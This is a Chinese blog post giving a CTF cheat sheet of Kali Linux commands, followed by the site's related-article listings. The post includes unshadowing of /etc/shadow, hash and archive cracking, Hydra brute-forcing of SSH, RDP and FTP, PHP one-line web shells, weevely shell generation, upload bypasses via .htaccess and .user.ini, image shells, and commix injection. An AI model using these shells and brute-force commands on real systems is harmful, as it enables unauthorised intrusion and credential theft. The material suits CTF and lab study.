ctf之kali linux一些工具的使用

于 2024-08-20 08:00:00 发布
阅读量2.1k 收藏 37
点赞数 41
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74475929/article/details/141298469
版权

杂项MISC

unshadow命令

基本上会结合/etc/passwd的数据和/etc/shadow的数据,创建1个含有用户名和密码详细信息的文件。

unshadown /etc/passwd /etc/shadow > 1.txt

加解密插件

Base64的使用

1.base64 <file> -----------base64加密

2.base -d -i <file>--------- base64解密 -i去除无用字符

密码爆破

Crunch

4.crunch 4 4 0123456789 > <file>-------- 生成一个最小长度为4和最大长度为4的0~9的四位数密码本

Hashcat

hashcat -a 0 "md5值" –force

john

john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。

上图是John爆破hash

John <file>

  1. 破解的用户密码稍微高级一些,比如根据用户名来设置密码,我们就需要John -Single 这个命令,原理是根据用户的名称,加上常见的变化而猜测密码。比如此用户叫test,而他的密码是test123test1tsettest123...

John passwd.txt -single

  1. 当用户的密码设置的十分困难时,我们就需要一个字典文件来进行破解,这时我们可以使用John -w –rules :使用字典文件来进行解密,如人们常用hello、admin、password、superman、cooler、asdfgh、 123456等作为自己的密码。而-rules参数则在此基础上再加上些变化,如字典中有单词test,则john还会尝试使用tes、teSt、 tset等单词变化进行解密。

John -w:b.txt passwd.txt -rules

rar2john

rar2john 1.rar ----获取1.rar的md5值,之后配合hashcat使用。

zip2john

使用John破解zip文件

zip2john flag.zip >> password.txt 用zip2john爆破flag.zip的hash文件

john password.txt 使用John命令,计算hash文件
 

zip2john 1.zip ----获取1.zip的md5值,之后配合hashcat使用。

7z2john

7z2john 1.7z ----获取7z的md5值,之后配合hashcat使用。

Binwalk

binwalk -e <file>------------ 分离文件

Exiftool

exiftool <file> ---------查看exif类型文件详细信息

Hydra的使用

Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 rdp----远程桌面爆破

Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 ssh ----ssh协议爆破

Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 ftp ----ftp协议爆破

扫描插件

注意:在kali中有默认的密码本,在/usr/share/wordlists目录下。

1.dirb使用

1.使用/usr/share/wordlists/dirb/big.txt 字典来扫描Web服务

dirb https://www.baidu.com  /usr/share/wordlists/dirb/big.txt -----dirb接url再接密码本的绝对路径

dirb <url> <file>

  1. 将扫描结果保存到文件中

dirb https://www.baidu.com/ -o output.txt /usr/share/wordlists/dirb/big.txt

  1. 列举指定后缀名目录

dirb https://www.baidu.com -X .php  /usr/share/wordlists/dirb/big.txt

  1. 添加毫秒延迟,避免洪水攻击

dirb http://www.baidu.com/ -z 100

2.whatweb使用

1.whatweb <url> --------扫描网站

2.whatweb 192.168.126.0/24-------扫描网段

3.whatweb <url> -c='<cookie>'------指定cookie

3.wpscan的使用

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。

wpscan --url "https://**********"

文件上传

weevely使用

<?php @eval($_GET['cmd']);?>

<?php @eval($_POST['cmd']);?>

<?php system($_GET['ls']);?>

创建一句话木马。

命令:weevely generate cmd /root/m.php

cmd是密码

/root/m.php是路径

连接weevely木马。(上传完后操作)

命令:weevely http://172.16.1.105/hackable/uploads/m.php cmd

http://172.16.1.105/hackable/upload/m.php是该木马文件在对方靶机里的路径

cmd 是密码,连接时一定要加上密码,千万不能忘记,否则会出问题。

出现weevely> 即为木马连接成功。

.htaccess

.htaccess ⽂件定义了 Apache 的解析规则,若存在以下⽂件,其内容会被 PHP script 解析

1 AddType  application/x-httpd-php .png

2 AddType  application/x-httpd-php .jpg

3 AddType  application/x-httpd-php .html

4 AddType  application/x-httpd-php .txt

5 ...

.user.ini

  1. auto_prepend_file = test.png  --------红色部分就是你上传的木马文件名

一句话木马

注:最好会php语言,不会就死记硬背

<?php @eval($_GET[‘cmd’]);?>

<?php @eval($_POST[‘cmd’]);?>

<?php system($_GET[‘ls’]);?>

<?php system($POST[ls]);?>

图片马

以管理员权限打开Windows命令行,切换到桌面目录

Copy 666.png/b + cmd.txt/a 888.png 就会复制一个新的888.png文件

数据库攻击

命令 / 代码注⼊ - commix

commix ⼯具遵循了 SQLmap 的命令格式,使⽤起来也⽐较⽅便

Get

commix -r https://www.example.com/index.php?code=1 --level 3-----红色部分表示url,绿色部分表示注入点。

POST

commix -r /home/leadlife/test/codeinj.txt  --level 3 –-----红色部分表示post信息保存的文件的绝对路径。

爬取可控参数并⾃动测试代码 / 命令注⼊

commix -u http://10.1.128/pikachu/ --crawl 3 --level 3

提权攻击

Find提权

Getcap提权

Which提权

 

Vmdk文件解压

Linux中

7z x flag.vmdk -o./

 

 

化尘归一
关注
Kali Linux中安装RsaCtfTool工具
Rational_HYJ的博客
04-22 1190
主要是在CTF比赛中涉及到RSA的题目,在Kali Linux中安装RsaCtfTool工具较为方便,直接上安装教程。 1.安装RsaCtfTool 命令:git clone https://github.com/Ganapati/RsaCtfTool.git 安装好以后进入RsaCtfTool目录下 (https://img-blog.csdnimg.cn/2020042216240...
kali网络渗透实验四:CTF实践
FFFde博客
12-25 2100
实验四 CTF实践实验目的系统环境实验工具实验内容实验步骤:1、发现目标 (netdiscover),找到WebDeveloper的IP地址2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,说明目标提供的服务有哪些?3、若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站4、利用whatweb探测目标网站使用的CMS模板5、网络搜索wpscan,简要说明其功能6、使用 Dirb 爆破网站目录,6、找到一个似乎和网络流量有关的目录(路径)7、利用Wireshark分析该数据包,分析TCP数据流
【安全】常见的kali安全工具,小白收藏!!
小司机的奥拓
12-19 1595
Kali系统预装了大量的安全工具,可以说是一个安全工具的数据库。在kali2018.2系统中就有600多个工具工具如此之多,掌握所有的工具是不现实的,只有需要用的时候再去学习工具使用即可。但是了解这些工具的用途,掌握一些常用的安全工具是必要的,本篇文章主要对一些常用的安全工具进行介绍,这里只需要简单地了解一下这些工具的用途和使用方法,在后边的文章中将会用到这些工具完成相应的实操,还会具体讲解这些工具使用
kali中常用的ctf工具
weixin_30383279的博客
09-27 2481
exiftool:查看图片的exif信息。 pngcheck:修复被破坏的png图片 pngtools:深入研究png文件的数据 steganographic:用来提取图片中的隐藏信息 stegsolve.jar:kali中没有该工具,但是可以自己下 gimp:提供了转换各类图像文件可视化数据的功能,还可以用于确认文件是否是一个图像文件。 ImageMagick:工具集可以嵌入在脚本中...
Kali Linux CTF Blueprints
11-22
It's a good book, especially considering there aren't really many like it out there and I like the humor/writing style as well as the layout. However, it definitely assumes you know a decent amount about infosec and system administration to get through it and it will not hold your hand through every step. I know the author can't cover it all but for those of you going through it here are some helpful tips I wish were in the book that I have come across so far: - Use Windows Server 2008 R2. 2012 and 2016 will not work with some facets of the Windows build. - It is best to update the OS to get some of the services running correctly (easily). - The URL in the book for ColdFusion appears to be for an UPDATE to 9.1, not the installer for 9.1 (which I can't seem to find) so I had to go with 9.2. - For SQL 2005 Express, make sure the processors are at a power of 2. It took me 3 days to figure out why I couldn't install SQL 2005 Express and it was because I had allocated 3 processors for my VM (same will go for physical builds with 5, 7, or 9 processors; it won't work). - SQL 2005 Express will not allow you to make the password for the sa user "sa" as the book instructs. I will continue to update this list as I go through the book in hopes to help others who are struggling a bit with the configuration of these machines. Cheers and happy hacking, -Ethan
kail做CTF杂项题的工具安利一波!
qidiandexiaowu
04-08 4884
前言:上周的比赛,知识和工具都补充了一波,着实吓到我这老菜鸟了。 1.blind-watermark 这个工具主要是解决盲水印问题。 克隆到kail里 python encode.py --image <image file> --watermark <watermark file> --result <result file> python decode.p...
ctfkali工具ettercap,setoolkit
viviliving的专栏
12-02 1082
;;f^^"""-._;;;""?;(PTF)set> 1: :(PTF)set> 2important:
Metosploit官方说明
qq_43776408的博客
08-31 401
Core Commands ============= Command Description ------- ----------- ? Help menu banner Display an awesome metasploit banner cd Change the...
kaliCTF靶场进行渗透测试找flag
最新发布
勤能补拙
05-09 1657
kali Linux做攻击机渗透测试CTF靶场找flag
ctf里的拼图工具_ctf之隐写工具
weixin_28267011的博客
02-23 1252
0x00 StegdetectStegdetect程序主要用于分析JPEG文件,可以检测到通过JSteg、JPHide、OutGuess、Invisible Secrets、F5、appendX和Camouflage等这些隐写工具隐藏的信息1,安装windows安装文件我没找到。我在kali安装Stegdetect比较简单apt-get install stegdetectOutGuess安装:h...
非常好用base64编码解码工具
09-19
非常好用base64编码解码工具 非常好用base64编码解码工具
CTF 大赛专用工具
06-05
工具不是本人专有,这个是我通过平常整理收集的一些专用且常用的工具
有关ctf的一些工具(随学习进程持续更新)
qq_40279081的博客
03-13 5212
1.vmware虚拟机以及kali系统 kali系统个人感觉类似工具箱,什么工具都有,还需要不断探索 2.burpsuite http抓包工具目前用在get,host一类的题上(其实它的功能个人感觉挺强大的只是我目前小白不太会用) 3.中国菜刀,蚁剑 他俩差不多,现在多用蚁剑,菜刀好像停止维护了用它做过连接一句话木马的题 蚁剑的github地址(比较官方,之前有很多有后门的,注意辨别) GitHub - AntSwordProject/antSword: 中国蚁剑是一款跨平台的开源网站管理工具
ctf之:kali-linux-2022-W48:metasploit启动
viviliving的专栏
12-09 1416
网上说是kali2.0里面没这个命令了,初始化就可以使用,没初始化的情况如下。初始化后的如下,应该初始化的,这工具没用过,上面的不对。查看postgresql的密码,我以为是加密的其实那就是密码。
kali linux渗透测试 第二章(2)sql简单绕过处理(ctf题目实例)
maluxiao123的博客
08-12 638
实验环境为win2003+phpstudy+php+mysql 要利用sql漏洞读取/tmp/360/key的文件,进入答题后发现会直接返回sql语句 在域名上我们可以看到有id=1的字符输入空格union空格select后返回如下 发现空格和union都没有显示,说明字符被过滤掉了,这时候我们就需要进行绕过,绕过的方式有改变大小写(如union->Union),双写(uniunionon在关键字中任意位置再插入一个),url编码(union-->%75%6E%69%6F%6.
CTF-学习记录之Kali linux的安装
zhanghongbin159的博客
10-06 847
首先安装虚拟机这没得说 然后按照这个网站上的资源进行下载安装 https://www.jb51.net/softs/714703.html 安装后,在终端中输入ls查看目录发现文件夹的名字是中文的,没有输入法,所以安装google中文输入法,安装方法如下: 1.sudo apt update #更新软件源 2.sudo apt install fcitx #安装谷歌输入法所依赖的包 3.sudo apt install fcitx-googlepinyin #安装谷歌输入法 4.注销或重新启动计算机 5.按
CTF比赛必备常用工具
热门推荐
Eason_LYC安全白帽子的成长博客
07-04 2万+
CTF常用工具stegsolve、Winhex、IDA、Ziperello、QR_Research、Exeinfo字典等应有尽有
CTF的一些常用工具
2201_75362610的博客
03-15 966
常见的序列也就是:二进制格式,字节数组,json字符串,xml字符串反序列化的考点也是比较刁钻的,很多人都是比较头疼的,包括现在的我见到反序列见到代码就恶心,这边列几个文章都是我学习反序列感觉比较好的文章!1,CSDN的:https://blog.csdn.net/solitudi/article/details/113588692这个文章基本上很全的罗列了一些CTF的反序列知识点2,先知社区的:https://xz.aliyun.com/t/9342。
ctf web 工具推荐
10-15
对于 CTF Web 比赛,以下是一些常用的工具: 1. Burp Suite:一款功能强大的代理工具,可以用于拦截和修改 HTTP 请求和响应,进行漏洞利用和渗透测试。 2. sqlmap:一款自动化 SQL 注入工具,可以自动检测和利用 SQL 注入漏洞。 3. dirsearch:一款快速的目录扫描工具,可以帮助你发现隐藏的目录和文件。 4. wfuzz:一款强大的 Web Fuzzer 工具,可以帮助你发现隐藏的参数和漏洞。 5. XSStrike:一款自动化 XSS 漏洞扫描工具,可以帮助你发现和利用 XSS 漏洞。 6. Nmap:一款网络扫描工具,可以帮助你发现目标主机的开放端口和服务。 7. Sublist3r:一款快速的子域名枚举工具,可以帮助你发现目标网站的子域名。 8. GitHack:一款自动化 Git 仓库泄露利用工具,可以帮助你发现 Git 仓库中的敏感信息。 9. Hydra:一款强大的密码爆破工具,可以帮助你破解登录页面的密码。 10. Metasploit:一款功能强大的渗透测试框架,可以帮助你发现和利用漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值